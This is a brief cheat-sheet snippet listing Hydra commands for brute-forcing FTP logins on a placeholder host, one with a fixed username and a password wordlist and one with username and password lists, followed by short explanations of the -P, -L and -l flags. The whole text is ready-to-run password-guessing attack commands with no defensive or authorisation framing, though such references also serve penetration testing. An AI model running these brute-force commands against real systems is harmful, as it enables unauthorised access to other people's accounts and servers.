# Bruteforce FTP hydra -t 1 -l admin -P ./wordlist.txt -vV www.example.com ftp # Bruteforce with username and passwd list hydra -t 1 -L usernames.txt -P passwd.txt -vV ftp://www.example.com
-P password wordlist
-L username list
-l username